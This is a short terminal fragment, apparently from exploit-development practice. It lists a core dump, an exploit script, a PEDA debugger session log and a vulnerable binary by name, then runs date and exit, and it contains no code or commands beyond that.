core.24733    exploit_vuln_cpp.py  peda-session-vuln_cpp.exe.txt  vuln_cpp.exe
$ date
Fri Mar  7 21:53:13 UTC 2025
$ exit
```